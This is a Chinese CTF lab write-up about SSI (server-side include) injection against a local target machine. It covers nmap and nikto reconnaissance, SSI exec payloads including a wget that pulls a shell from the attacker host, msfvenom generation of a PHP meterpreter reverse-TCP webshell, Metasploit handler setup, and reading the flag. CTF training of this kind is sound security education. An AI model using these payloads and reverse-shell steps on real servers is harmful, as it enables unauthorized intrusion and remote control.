如何从外部进入主机

  • SSI注入攻击简介
  • 实验
    • (一)实验环境
    • (二)信息探测
    • (三)深入挖掘
    • (四)漏洞利用
    • (五)制作webshell
    • (六)启动监听
    • (七)上传shell反弹shell
    • (八)执行操作
    • (九)获取Flag
  • 总结

SSI注入攻击简介

SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。

如果在网站目录中发现了.stm,.shtm,.shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。

实验

(一)实验环境

  • 攻击机 kail linux:192.168.1.103
  • 靶场机器:192.168.1.106
  • 目的:获取靶场机器上的flag值

(二)信息探测

  • 扫描主机服务信息以及服务版本
    – nmap -sV 靶场IP地址

  • 快速扫描主机全部信息
    – nmap -T4 -A -v 靶场IP地址

  • 探测敏感信息
    – nikto -host http://靶场IP地址:端口

(三)深入挖掘

  • 分析nmap、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息。

  • 使用浏览器打开 http://ip:port/敏感页面,查看敏感信息,找到可利用的位置。

(四)漏洞利用

根据提示来利用SSL注入漏洞

  • 列举当前目录的文件和目录
<!--#exec cmd="ls" -->
  • 切换到指定目录
<!--#exec cmd="cd /root/dir/" -->
  • 下载shell脚本 并重命名为shell.php
<!--#exec cmd="wget http://ip/shell/txt | rename shell.txt shell.php"-->

(五)制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

(六)启动监听

msf> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

(七)上传shell反弹shell

绕过过滤机制的方法:大小写绕过

(八)执行操作

sysinfo 查看系统信息
shell 进入系统shell

优化终端 python -c ‘import pty;pty:spawn(“/bin/bash”)’

(九)获取Flag

一般情况下,靶场机器的flag值是放在服务器的根目录下,/root/目录。

cd /root/
ls
cat flag
writeup (操作文档)

总结

在CTF比赛中,对于SSI漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写。

CTF训练 web安全SSI注入相关推荐

  1. ctf训练 web安全暴力破解

    ctf训练 web安全暴力破解 暴力破解漏洞介绍 穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕.若某个情况验证符合题目的全部条件, ...

  2. i春秋CTF训练 Web 破译

    Web 破译 题目内容:破译下面的密文: TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 W ...

  3. ctf训练 web安全暴力破解

    此次的方法叫做穷举法,也成为枚举法.就是把可能问题一一列举出来. 第一步同样是信息探测(包括敏感信息的探测) 信息探测 这次只说一下信息探测的以往的语法: 扫描主机服务信息以及服务版本 nmap -s ...

  4. ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)

    主机:192.168.32.152 靶机:192.168.32.161 ssI是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtm ...

  5. nginx反代web页面没有正常显示_web漏洞-SSI注入漏洞深入详解

    SSI 注入全称Server-Side Includes Injection,即服务端包含注入.SSI 是类似于 CGI,用于动态页面的指令.SSI 注入允许远程在 Web 应用中注入脚本来执行代码. ...

  6. switchyomega插件_CTF|你所关注的CTFer都在用的插件合集【附:XXE补给+CTF训练集】...

    不看后悔系列,建议收藏 相信大家对 CTF 都不陌生了,今天为大家带来了一系列 CTF 必备 Chrome 插件. CTF 可能很多人想学 CTF,但又怕零基础学不懂.其实,CTF 并没有那么难. C ...

  7. SSI注入(server side includes injection 服务器端包含注入)

    0x01 什么是SSI和SSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思.从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或 ...

  8. CTFshow——web入门——sql注入

    web入门--sql注入 基础知识点 判断是否注入 order by 判断列数 使用union select 判断回显 查询数据库 web171 web172 web173 web174 web175 ...

  9. ctfshow web入门-sql注入

    ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...

最新文章

  1. 微软和 SAP 扩展了云环境中的合作关系
  2. 手动安装oracle软件 删软件
  3. android input设备event处理以及hotplug检测
  4. leetcode [114]Flatten Binary Tree to Linked List
  5. Oacle 开窗函数 分析函数
  6. 28行代码AC——Minimum Sum LCM UVA - 10791(最大质因子)
  7. java线程的优点_Java使用多线程的优势
  8. 跨平台(windows+linux)的线程辅助程序,跨平台(Windows+Linux)的Socket通讯程序(二)—结构...
  9. 图解红黑树和JAVA实现
  10. Ponemon Institute告诉你,大数据正在勾搭网络安全
  11. VS Code 的插件位置更改
  12. 扩容卡检测(win下,能作为参考)
  13. Mysql-什么是聚集索引和非聚集索引?
  14. linux中支持gb18030的输入法,教程:智能的陈巧五笔输入法linux v1.1最新版本
  15. 诗词教育不过是老虎嘴上的胡子
  16. pythoneducoder苹果梨子煮水的功效_【苹果梨子煮水喝的功效】_苹果好处_作用-大众养生网...
  17. Lua初学者(一)--Lua 简单教学
  18. 你是我生命中最美丽的温暖
  19. 微信小程序 NFC HCE卡模拟
  20. 使用Arduino与A4988 驱动步进电机

热门文章

  1. 使用aireplay-ng抓握手包笔记
  2. Powershell免杀系列(二)
  3. Blocked a frame with origin “https://my.xxxxxxx.com“ from accessing a cross-origin frame.
  4. ios html加载css样式,iOS加载HTML, CSS代码
  5. 小程序服务器如何防攻击,中小网站防止DDOS攻击的方法
  6. 使用体素场存储场景数据
  7. 分布式事务之TX-LCN
  8. MOSFET与MOSFET驱动电路原理及应用(转)
  9. 学术顶会再突破!计算平台 MaxCompute 论文入选国际顶会VLDB 2021
  10. 【转】投资从入门到精通,七本经典书籍